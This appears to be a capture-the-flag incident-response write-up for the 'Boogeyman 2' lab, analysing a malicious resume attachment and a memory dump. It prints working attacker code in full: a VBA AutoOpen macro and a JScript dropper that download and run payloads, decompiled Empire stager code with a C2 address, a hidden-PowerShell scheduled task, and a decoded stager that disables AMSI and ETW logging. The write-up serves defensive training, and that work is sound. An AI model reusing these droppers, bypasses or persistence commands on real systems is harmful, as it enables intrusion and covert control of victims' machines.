Boogeyman 2

The Boogeyman is back. Are you still afraid of the Boogeyman?

CONTEXT

I. Background

Maxine, a Human Resource Specialist working for Quick Logistics LLC, received an application from one of the open positions in the company. Unbeknownst to her, the attached resume was malicious and compromised her workstation.

Header Value

Header	Value
From	`"westaylor23@outlook.com" <westaylor23@outlook.com>`
To	`"maxine.beck@quicklogisticsorg.onmicrosoft.com"`
Content-Type	`application/msword; name="Resume_WesleyTaylor.doc"`

From

"westaylor23@outlook.com" <westaylor23@outlook.com>

"maxine.beck@quicklogisticsorg.onmicrosoft.com"

Content-Type

application/msword; name="Resume_WesleyTaylor.doc"

II. Artifacts

1. Exfiltration

A Python3 http server was started in the THM machine:

ubuntu@tryhackme:~$ cd Desktop/Artefacts/

ubuntu@tryhackme:~/Desktop/Artefacts$ python3 -m http.server

Then the files were downloaded using a local browser:

2. Email Attachment

The attachment includes a .doc file which was extracted and checked for completion:

$ cat Resume\ -\ Application\ for\ Junior\ IT\ Analyst\ Role.eml | grep -i -E '^[A-Z0-9+/=]{32,76}' | tr -d '\r\n' | base64 -d > Resume_WesleyTaylor.doc

$ file Resume_WesleyTaylor.doc

  Resume_WesleyTaylor.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: tryhackme, Template: Normal, Last Saved By: tryhackme, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 05:00, Create Time/Date: Sun Aug 20 21:49:00 2023, Last Saved Time/Date: Sun Aug 20 22:24:00 2023, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
  
$ binwalk Resume_WesleyTaylor.doc                                                                                                                       

  DECIMAL       HEXADECIMAL     DESCRIPTION
  --------------------------------------------------------------------------------
  4865          0x1301          PNG image, 468 x 222, 8-bit/color RGBA, non-interlaced
  4919          0x1337          TIFF image data, big-endian, offset of first image directory: 8
  35138         0x8942          Zip archive data, at least v2.0 to extract, compressed size: 255, uncompressed size: 540, name: [Content_Types].xml
  35442         0x8A72          Zip archive data, at least v2.0 to extract, compressed size: 192, uncompressed size: 310, name: _rels/.rels
  35675         0x8B5B          Zip archive data, at least v2.0 to extract, compressed size: 131, uncompressed size: 138, name: theme/theme/themeManager.xml
  35864         0x8C18          Zip archive data, at least v2.0 to extract, compressed size: 1939, uncompressed size: 8393, name: theme/theme/theme1.xml
  37855         0x93DF          Zip archive data, at least v2.0 to extract, compressed size: 182, uncompressed size: 283, name: theme/theme/_rels/themeManager.xml.rels
  38455         0x9637          End of Zip archive, footer length: 22
  38477         0x964D          XML document, version: "1.0"
  
$ md5sum Resume_WesleyTaylor.doc                     

  52c4384a0b9e248b95804352ebec6c5b  Resume_WesleyTaylor.doc

3. Memory Dump

The compromised workstation seems to be running on Windows 10:

$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw imageinfo
  
  Volatility Foundation Volatility Framework 2.6.1
  INFO    : volatility.debug    : Determining profile based on KDBG search...
           Suggested Profile(s) : Win10x64_18362
                      AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                      AS Layer2 : FileAddressSpace ($THM/Boogeyman2/WKSTN-2961.raw)
                       PAE type : No PAE
                            DTB : 0x1aa000L
                           KDBG : 0xf802536405e0L
           Number of Processors : 2
      Image Type (Service Pack) : 0
                 KPCR for CPU 0 : 0xfffff80252340000L
                 KPCR for CPU 1 : 0xffffa601e54c0000L
              KUSER_SHARED_DATA : 0xfffff78000000000L
            Image date and time : 2023-08-21 14:14:28 UTC+0000
      Image local date and time : 2023-08-21 15:14:28 +0100

And that particular endpoint is owned by maxine.beck:

$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw filescan | grep 'Resume_WesleyTaylor'

  0xe58f86465740  \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc	216
  0xe58f878c1420  \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc	216

ANALYSIS

I. MalDoc

The email attachment includes a macro (denoted by the character, M) named NewMacros:

$ python3 ./git/DidierStevensSuite/oledump.py ./CTF/THM/Boogeyman2/Resume_WesleyTaylor.doc                   

    1:       114 '\x01CompObj'
    2:      4096 '\x05DocumentSummaryInformation'
    3:      4096 '\x05SummaryInformation'
    4:      7288 '1Table'
    5:     28574 'Data'
    6:       414 'Macros/PROJECT'
    7:        71 'Macros/PROJECTwm'
    8: M    2027 'Macros/VBA/NewMacros'
    9: m     962 'Macros/VBA/ThisDocument'
   10:      2787 'Macros/VBA/_VBA_PROJECT'
   11:      2242 'Macros/VBA/__SRP_0'
   12:       122 'Macros/VBA/__SRP_1'
   13:       935 'Macros/VBA/__SRP_2'
   14:       156 'Macros/VBA/__SRP_3'
   15:       570 'Macros/VBA/dir'
   16:      4096 'WordDocument'

Looking at what it does:

$ python3 ./git/DidierStevensSuite/oledump.py -s 8 --vbadecompress $THM/Boogeyman2/Resume_WesleyTaylor.doc

Once the document is opened, it will download a file (upload.png) and save it as update.js then execute it via wscript.exe:

Attribute VB_Name = "NewMacros"
Sub AutoOpen()

spath = "C:\ProgramData\"
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png", False
xHttp.Send
With bStrm
    .Type = 1
    .Open
    .write xHttp.responseBody
    .savetofile spath & "\update.js", 2
End With

Set shell_object = CreateObject("WScript.Shell")
shell_object.Exec ("wscript.exe C:\ProgramData\update.js")

End Sub

Confirming the execution via the memory dump, the malicious process, wscript.exe (PID 4260) indeed spawned from Microsoft Word (PID 1124) and eventually updater.exe (PID 6216):

$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 pstree | grep -C2 -i wscript

  Volatility Foundation Volatility Framework 2.6.1
  ... 0xffffe58f87c8a080:OUTLOOK.EXE                   1440    596     22      0 2023-08-21 14:09:04 UTC+0000
  .... 0xffffe58f81150080:WINWORD.EXE                  1124   1440     18      0 2023-08-21 14:12:31 UTC+0000
  ..... 0xffffe58f864ca0c0:wscript.exe                 4260   1124      6      0 2023-08-21 14:12:47 UTC+0000
  ...... 0xffffe58f87ac0080:updater.exe                6216   4260     18      0 2023-08-21 14:12:48 UTC+0000
  ....... 0xffffe58f84bd1080:conhost.exe               4464   6216      5      0 2023-08-21 14:14:03 UTC+0000

II. C2 Callback

To figure out the origins of updater.exe, the initially downloaded file (update.png) was extracted from the memory dump:

$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw filescan | grep 'update'   

  0xe58f836edc60  \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\IE\GEX3PLZ6\update[1].png	216
  0xe58f8928f8b0  \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\IE\FMJK14EZ\update[1].exe	216
  0xe58f89291e30  \Windows\Tasks\updater.exe	216
  0xe58f89293730  \Windows\Tasks\updater.exe	216
  
$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw -o $THM/Boogeyman2/volatility/ windows.dumpfiles --virtaddr 0xe58f836edc60

  Volatility 3 Framework 2.5.2
  Progress:  100.00		PDB scanning finished                        
  Cache	                FileObject      FileName        Result

  DataSectionObject     0xe58f836edc60  update[1].png   file.0xe58f836edc60.0xe58f87ddb320.DataSectionObject.update[1].png.dat

The following shows that a file (update.exe) is downloaded and saved as updater.exe which is then executed as is:

var Object = WScript.CreateObject('MSXML2.XMLHTTP');
var wshell = new ActiveXObject("WScript.Shell");

var location = "C:\\Windows\\Tasks\\";
var filename = "updater.exe";

var url = "https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe"
Object.Open('GET', url, false);
Object.Send();

if (Object.Status == 200)
{
 var Stream = WScript.CreateObject('ADODB.Stream');
 Stream.Open();
 Stream.Type = 1; // Stream type 1 to set binary stream
 Stream.Write(Object.ResponseBody);
 Stream.Position = 0;
 Stream.SaveToFile(location + filename, 2); // option 2 to force overwrite
 Stream.Close();
}

wshell.Run("cmd.exe /c reg.exe add \"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\" /v C:\\Windows\\Tasks /f");


wshell.Run(location + filename);
WScript.Sleep(5*60*1000);

Looking at what updater.exe is, it was extracted from the memory dump then decompiled using dnSpy:

$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 procdump -D $THM/Boogeyman2/volatility -p 6216                     

  Volatility Foundation Volatility Framework 2.6.1
  Process(V)         ImageBase          Name                 Result
  ------------------ ------------------ -------------------- ------
  0xffffe58f87ac0080 0x0000000000c20000 updater.exe          OK: executable.6216.exe
  
$ file executable.6216.exe

  executable.6216.exe: PE32+ executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 2 sections

It is an Empire stager compiled via Sharpire:

// Sharpire.EmpireStager
// Token: 0x06000010 RID: 16 RVA: 0x00002578 File Offset: 0x00000778
public EmpireStager(SessionInfo sessionInfo1)
{
	this.sessionInfo = sessionInfo1;
	this.stagingKeyBytes = Encoding.ASCII.GetBytes(this.sessionInfo.GetStagingKey());
	Random random = new Random();
	char[] array = "ABCDEFGHKLMNPRSTUVWXYZ123456789".ToCharArray();
	StringBuilder stringBuilder = new StringBuilder(8);
	for (int i = 0; i < 8; i++)
	{
		int num = random.Next(array.Length);
		stringBuilder.Append(array[num]);
	}
	this.sessionInfo.SetAgentID(stringBuilder.ToString());
	CspParameters cspParameters = new CspParameters();
	cspParameters.Flags |= CspProviderFlags.UseMachineKeyStore;
	this.rsaCrypto = new RSACryptoServiceProvider(2048, cspParameters);
}

And calls back to 128.199.95.189:8080:

using System;
using Sharpire;

// Token: 0x02000002 RID: 2
public static class Program
{
    // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
    public static void Main()
    {
        try
        {
	    string text = "http://128.199.95.189:8080";
            string text2 = "xF}DlXKtjZ9/zaS2>smYiUC+;-yLqQOp";
            string workingHours = "";
            uint defaultDelay = 5U;
            double defaultJitter = 0.0;
            uint defaultLostLimit = 60U;
            string text3 = "dotnet";
            SessionInfo sessionInfo = new SessionInfo(new string[]
            {
                text,
                text2,
                text3
            });
            sessionInfo.SetWorkingHours(workingHours);
            sessionInfo.SetDefaultJitter(defaultJitter);
            sessionInfo.SetDefaultDelay(defaultDelay);
            sessionInfo.SetDefaultLostLimit(defaultLostLimit);
            new EmpireStager(sessionInfo).Execute();
        }
        catch (Exception ex)
        {
            Console.WriteLine(string.Concat(new string[]
            {
                ex.GetType().FullName,
                ": ",
                ex.Message,
                Environment.NewLine,
                ex.StackTrace
            }));
        }
    }
}

Which when confirmed via the memory dump, there was a connection but seems to have been marked as CLOSED but the process is still running meaning the agent might be currently inactive:

$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 netscan | grep -C2 updater.exe        

  Volatility Foundation Volatility Framework 2.6.1
  WARNING : volatility.debug    : Cannot find nt!ObGetObjectType
  0xe58f86b73010     TCPv4    10.10.49.181:63308             128.199.95.189:8080  CLOSED           -1                      3884-06-06 01:06:33 UTC+0000
  0xe58f87604010     TCPv4    10.10.49.181:63218             20.42.65.88:443      CLOSED           -1                      3884-06-06 01:06:31 UTC+0000
  0xe58f8797fc40     UDPv4    0.0.0.0:0                      *:*                                   6216     updater.exe    2023-08-21 14:12:48 UTC+0000
  0xe58f87980570     UDPv4    0.0.0.0:0                      *:*                                   6216     updater.exe    2023-08-21 14:12:48 UTC+0000
  0xe58f87980570     UDPv6    :::0                           *:*                                   6216     updater.exe    2023-08-21 14:12:48 UTC+0000

III. Persistence

Extracting the process memory of updater.exe from the dump to see if command executions could be discovered:

$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 memdump -p 6216 -D $THM/Boogeyman2/volatility

  Volatility Foundation Volatility Framework 2.6.1
  ************************************************************************
  Writing updater.exe [  6216] to 6216.dmp

It can be seen that a scheduled task named Updater was attempted to be created:

$ strings -el 6216.dmp | grep -i "powershell.exe "

  "C:\Windows\system32\schtasks.exe" /Create /F /SC DAILY /ST 09:00 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\""
  "C:\Windows\system32\schtasks.exe" /Create /F /SC DAILY /ST 09:00 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\""

Confirming if the scheduled task was created, the task file was extracted from the memory dump:

$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw filescan | grep -i 'System32\\Tasks\\'

  0xe58f86b42440  \Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask	216
  0xe58f89295990  \Windows\System32\Tasks\Updater	216
  
$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw -o $THM/Boogeyman2/volatility/ windows.dumpfiles --virtaddr 0xe58f89295990

  Volatility 3 Framework 2.5.2
  Progress:  100.00		PDB scanning finished                        
  Cache	                FileObject      FileName        Result

  DataSectionObject     0xe58f89295990  Updater         file.0xe58f89295990.0xe58f838dcbe0.DataSectionObject.Updater.dat

The following is the XML configuration of the scheduled task indicating its successful creation:

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
    <RegistrationInfo>
        <Date>2023-08-21T15:14:03</Date>
        <Author>QUICKLOGISTICS\maxine.beck</Author>
        <URI>\Updater</URI>
    </RegistrationInfo>
    <Triggers>
        <CalendarTrigger>
            <StartBoundary>2023-08-21T09:00:00</StartBoundary>
            <Enabled>true</Enabled>
            <ScheduleByDay>
                <DaysInterval>1</DaysInterval>
            </ScheduleByDay>
        </CalendarTrigger>
    </Triggers>
    <Settings>
        <!-- omitted -->
    </Settings>
        <Actions Context="Author">
        <Exec>
            <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
            <Arguments>-NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))"</Arguments>
        </Exec>
    </Actions>
    <Principals>
        <Principal id="Author">
            <UserId>QUICKLOGISTICS\maxine.beck</UserId>
            <LogonType>InteractiveToken</LogonType>
            <RunLevel>LeastPrivilege</RunLevel>
        </Principal>
    </Principals>
</Task>

The command being run by the scheduled task executes a base64 encoded string stored in an HKEY_CURRENT_USER registry meaning that it should be visible in the compromised user, maxine.beck's NTUSER.DAT file. And, extracting the particular hive from the memory dump:

$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 hivelist                                 

  Volatility Foundation Volatility Framework 2.6.1
  Virtual            Physical           Name
  ------------------ ------------------ ----
  0xffff9582f2681000 0x000000000f08d000 \??\C:\Users\maxine.beck\ntuser.dat
  0xffff9582f1ad4000 0x0000000013f84000 \??\C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\UsrClass.dat
  0xffff9582f326d000 0x000000001ed22000 \??\C:\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.StartMenuExperienceHost_10.0.18362.387_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat
  0xffff9582eae0d000 0x00000000009ad000 [no name]
  0xffff9582eae33000 0x00000000072ca000 \REGISTRY\MACHINE\SYSTEM
  0xffff9582ee925000 0x0000000023098000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
  0xffff9582eea98000 0x0000000020d34000 \SystemRoot\System32\Config\BBI
  0xffff9582eead5000 0x00000000323b5000 \REGISTRY\USER\S-1-5-19
  0xffff9582efe8e000 0x00000000054f7000 \REGISTRY\A\{c5dbb98f-ac23-f861-cb09-87c8bc73488b}
  0xffff9582f11fc000 0x00000000301f8000 [no name]
  0xffff9582f2b90000 0x00000000369ba000 [no name]
  0xffff9582eb808000 0x000000001003a000 \REGISTRY\MACHINE\SOFTWARE
  0xffff9582f050b000 0x00000000154b2000 \Device\HarddiskVolume1\Boot\BCD
  0xffff9582f2c10000 0x0000000019aed000 \REGISTRY\A\{91B92570-4098-466B-9A97-B1F699128FD3}
  0xffff9582eb805000 0x000000000ddc1000 \REGISTRY\USER\.DEFAULT
  0xffff9582f26ac000 0x000000000662b000 \??\C:\Users\maxine.beck\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat

$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 dumpregistry -D $THM/Boogeyman2/volatility -o 0xffff9582f2681000

  Volatility Foundation Volatility Framework 2.6.1
  **************************************************
  Writing out registry: registry.0xffff9582f2681000.ntuserdat.reg

  [..omitted..]
  ***********************************************

Then, looking for long base64 strings stored:

$ strings -el registry.0xffff9582f2681000.ntuserdat.reg | grep -i -E '[a-z0-9\+\/=]{100,}' 

  SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATwBBAEEAdQBBAEQARQBBAE8AUQBBADUAQQBDADQAQQBPAFEAQQAxAEEAQwA0AEEATQBRAEEANABBAEQAawBBAE8AZwBBADQAQQBEAEEAQQBPAEEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB4AEYAfQBEAGwAWABLAHQAagBaADkALwB6AGEAUwAyAD4AcwBtAFkAaQBVAEMAKwA7AC0AeQBMAHEAUQBPAHAAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAGgAbABGAEsAcwBBAE8AagA9AFkAYgBNAEwANwAxAGsAUgBtAEsAZQBBADUAMAAzAE0AOABWAGoAcwA4AFcAOABXADQAZgBZAD0AIgApADsAJABkAGEAdABhAD0AJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcwBlAHIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAdABhAFsAMAAuAC4AMwBdADsAJABkAGEAdABhAD0AJABkAGEAdABhAFsANAAuAC4AJABkAGEAdABhAC4AbABlAG4AZwB0AGgAXQA7AC0AagBvAGkAbgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
  
$ strings -el registry.0xffff9582f2681000.ntuserdat.reg | grep -i -E '[a-z0-9\+\/=]{100,}' | base64 -d

  If($PSVersionTable.PSVersion.Major -ge 3){$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Static').Setvalue($Null,$true);[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0);};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADIAOAAuADEAOQA5AC4AOQA1AC4AMQA4ADkAOgA4ADAAOAAwAA==')));$t='/news.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('xF}DlXKtjZ9/zaS2>smYiUC+;-yLqQOp');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","hlFKsAOj=YbML71kRmKeA503M8Vjs8W8W4fY=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX

It is another Empire stager which was set up for persistence:

If($PSVersionTable.PSVersion.Major -ge 3){
    $Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');
    $Ref.GetField('amsiInitFailed','NonPublic,Static').Setvalue($Null,$true);
    [System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0);
};

[System.Net.ServicePointManager]::Expect100Continue=0;
$wc=New-Object System.Net.WebClient;
$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADIAOAAuADEAOQA5AC4AOQA1AC4AMQA4ADkAOgA4ADAAOAAwAA==')));
$t='/news.php';
$wc.Headers.Add('User-Agent',$u);
$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('xF}DlXKtjZ9/zaS2>smYiUC+;-yLqQOp');
$R={
    $D,$K=$Args;
    $S=0..255;0..255|%{
        $J=($J+$S[$_]+$K[$_%$K.Count])%256;
        $S[$_],$S[$J]=$S[$J],$S[$_]
    };
    $D|%{
        $I=($I+1)%256;
        $H=($H+$S[$I])%256;
        $S[$I],$S[$H]=$S[$H],$S[$I];
        $_-bxor$S[($S[$I]+$S[$H])%256]
    }
};
$wc.Headers.Add("Cookie","hlFKsAOj=YbML71kRmKeA503M8Vjs8W8W4fY=");
$data=$wc.DownloadData($ser+$t);
$iv=$data[0..3];
$data=$data[4..$data.length];
-join[Char[]](& $R $data ($IV+$K))|IEX

Which also calls back to 128.199.95.189:8080:

$ echo aAB0AHQAcAA6AC8ALwAxADIAOAAuADEAOQA5AC4AOQA1AC4AMQA4ADkAOgA4ADAAOAAwAA== | base64 -d

  http://128.199.95.189:8080

PreviousBoogeyman 3 NextBoogeyman 1

Last updated 1 year ago